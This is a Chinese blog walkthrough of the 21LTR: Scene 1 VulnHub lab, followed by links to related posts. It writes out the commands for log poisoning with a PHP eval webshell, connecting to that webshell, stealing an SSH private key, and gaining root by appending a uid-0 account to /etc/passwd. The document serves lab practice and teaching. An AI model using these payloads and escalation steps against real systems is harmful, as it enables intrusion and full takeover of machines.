Hack the 21LTR: Scene 1 靶机

于 2024-09-14 09:39:26 发布
阅读量235 收藏 3
点赞数 8
文章标签: android 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a666666688/article/details/142249985
版权

靶机配置

kali配置

虚拟网络适配器配置

不行的时候关闭虚拟机,多点几次生成

主机发现和端口扫描

主机发现

arp-scan -l

端口扫描

端口扫描发现21,22,80端口开放

nmap -sV -A -T4 192.168.2.120

访问80端口

http://192.168.2.120/

查看页面源码

发现账户密码

猜测是ftp的用户和密码

ftp连接

ftp 192.168.2.120

ls

下载并读取文件

get backup_log.php /home/kali/Desktop/1.php
cat 1.php

查看1.php文件

是个html文件,尝试将其源文件拼接在网页访问

http://192.168.2.120/logs/backup_log.php/

尝试在日志文件写入木马,参考了一下其他文档,需要利用10001端口

nc -nv 192.168.2.120 10001
<?php @eval($_REQUEST['cmd']);?>

蚁剑连接

查看敏感文件

/etc/passwd

双击进入

因为有ssh服务,就读取一下密钥

/media/USB_1/Stuff/Keys/id_rsa

下载id_rsa文件到本地再拖到kali

赋予id_rsa读写权限

chmod 600 id_rsa

ssh登录

ssh -i id_rsa hbeale@192.168.2.120

修改config文件

cd ~/.ssh
vim config

添加以下信息

Host *
    HostKeyAlgorithms +ssh-rsa

要是有这个报错的话(sign_and_send_pubkey: no mutual signature supported)

将以下内容写入config

cd ~/.ssh
vim config
echo "PubkeyAcceptedKeyTypes +ssh-rsa" >> config

ssh连接

ssh -i id_rsa hbeale@192.168.2.120

创建用户密码

openssl命令生成密码

openssl passwd 123456

创建用户,创建完成后Ctrl+c退出

sudo /usr/bin/cat >> /etc/passwd
aroot:$1$J1DRKiec$c6CXi9UUFTMKwHS6lk3bI1:0:0:/root:/bin/bash

切换用户,查看是否提权成功

su aroot
密码:123456
id
whoami

提权成功

fasewer
关注
CTF之21LTR Scene1 靶机渗透(日志信息,Wireshark抓包)
afei001
08-02 727
  练习环境     攻击机:kali     靶机21LTR: Scene1     下载地址:https://download.vulnhub.com/21ltrcom/21LTR.com_Scene1_2.120_v1.0.iso      1.发现靶机,端口扫描 root@kali:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.2.3 .
21LTR: Scene 1靶机
m0_61995767的博客
07-30 590
21LTR: Scene 1打靶记录
vulnhub系列:21LTR:Scene1靶机
jq_j37的博客
07-29 382
21LTR:Scene1靶机,打靶文章
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 411
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
21LTR:Scene1超详细靶机实战
weixin_68615160的博客
07-30 431
考虑到是日志文件,我们可以尝试将一句话木马写到日志文件中获取shell。读取密钥 /media/USB_1/Stuff/Keys/id_rsa。尝试用该账号连接ssh服务和ftp服务,成功连接ftp服务。我们想起来刚刚目录探测有一个logs目录,我们尝试访问。将newroot用户写入到/etc/passwd。发现不需要密码的只有cat命令,我们就用它去提权。我们F12查看页面源码可以发现一个用户和密码。考虑到有ssh服务,我们可以使用密钥免密登录。写入一个高权限用户到/etc/passwd。
Vulhub21LTR:Scene靶机详解
最新发布
weixin_62457642的博客
09-13 248
靶机21LTR:Scene速刷
21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
zdd1453691081的博客
07-30 372
【代码】21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
21LTR-Scene靶机渗透测试
weixin_58786230的博客
07-30 426
【代码】21LTR-Scene靶机渗透测试。
第一章 Kali与靶机系统
Evil_invisible的博客
01-08 4187
目录 1.1 Kali 的简介 1.2 Kali的功能 1.3 Kali的安装 1.4 Kali的设置 1.4.1 Kali 网络设置 1. 有线网络设置 2. 无线网络设置 1.4.2 服务设置 1. VMware服务设置 2. Kali服务设置 1.5 靶机系统的介绍 1.1 Kali 的简介 Kali 是一个基于Debian的Linux发行版 Kali预装了大量安...
Vulnhub靶机渗透之21LTRvunlhub
2301_77039831的博客
10-17 275
到这里有两种思路,因为可以通过root的cat命令读取文件,所以可以看/etc/shadow,也可以写入该文件。由于是php的日志所以思路是想办法把一句话写入这个页面,看了下其他大佬的WP,得访问10001端口。接下来是方法二,因为可以读取shadow文件,所以试图将root的shadow文件的密码进行破解。连接后看下敏感文件,结合靶机有ssh服务,尝试读取密钥,发现可以读取。先创建一个文件,内容是root的加密密码,然后使用john解密。先nmap扫一下,发现有21,22,80端口。
LQG-LTR:精馏塔多变量控制中的LqG/LTR方法-matlab开发
05-30
1. 精馏塔过程的数学模型,通常用状态空间形式表示。 2. Kalman滤波器的实现,用于估计系统的不确定状态。 3. LQG控制器的设计,包括权重矩阵的选择,以优化特定的性能指标。 4. 李雅普诺夫函数的构造和分析,确保...
panel-navigation-rtl-ltr:带有RTL支持的精美面板导航
05-11
标题 "panel-navigation-rtl-ltr:带有RTL支持的精美面板导航" 暗示了这是一个设计用于后台管理界面(admin dashboard)的导航组件,它具备右到左(RTL)和左到右(LTR)的语言布局支持。这在处理多语言网站或者需要...
ltr-tools:一套用于学习排名的命令行工具
05-19
该项目同时包含ltr-tools cli和solr配置,以提供后端搜索功能。 该项目的主要范围将是提供有用的工具,以帮助“学习排名”集成和开发。 ltr-tools是一个命令行界面,用于运行一组实用程序任务,以可视化,调试和...
LtR-Feature-Extractor:学习排名特征提取任务
04-28
《LtR特征提取器:深度探索学习排名与信息检索》 在信息检索(IR)领域,学习排名(Learning-to-Rank, LTR)是一种至关重要的技术,它通过机器学习方法来优化文档排序,以提高搜索结果的相关性。LtR特征提取器就是...
S905X3安卓9.0 安卓11 手柄驱动 调试命令 ampere:/ $ getevent -ltr add device 1
06-14
标题中的"S905X3安卓9.0 安卓11 手柄驱动"指的是基于Amlogic S905X3芯片的设备在运行Android 9.0或Android 11操作系统时的手柄驱动程序。S905X3是一款常见的应用于智能电视盒和流媒体设备的系统级芯片。...
Android - NDK:在Jni中打印Log信息
dami_lixm的专栏
09-10 312
在Jni中打印Log信息 1、在配置CMakeLists.txt find_library( # Sets the name of the path variable. log-lib # Specifies the name of the NDK library that # you want CMake to locate. log) # Specifies libraries CMake should link to your targ
Apple M3编译OpenSSL安卓平台SO库
09-13 114
添加ANDROID_NDK_ROOT环境变量,iosdev改为你自己的用户名。头文件安装位置:/usr/local/include/openssl。2.配置NDK环境变量:vim ~/.zprofile。5.安装: sudo make install。添加NDK下可执行文件路径到PATH环境变量。库文件安装位置:/usr/local/lib。进入openssl源码目录,执行下面指令。4.编译:输入make后回车。验证文件是否为arm平台的。
Unity for Android使用蓝牙低功耗Bluetooth LE
zouxin_88的专栏
09-13 425
插件:Bluetooth LE for iOS and Android v2.3.unitypackage。
WebShell流量特征检测_菜刀篇
徐徐徐的博客
09-09 694
4、全版本菜刀规则总结可以看到三个版本的菜刀都有这一串字符,我们在对蚁剑连接webshell的流量进行分析时也会见到这一串字符,其实不止这么短,但是对规则而言已经足够了。蚁剑的核心源代码有很多都是借鉴菜刀的。PHP ini_set用来设置php.ini的值,在函数执行时生效##设置错误信息的类别(不显示错误报告)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值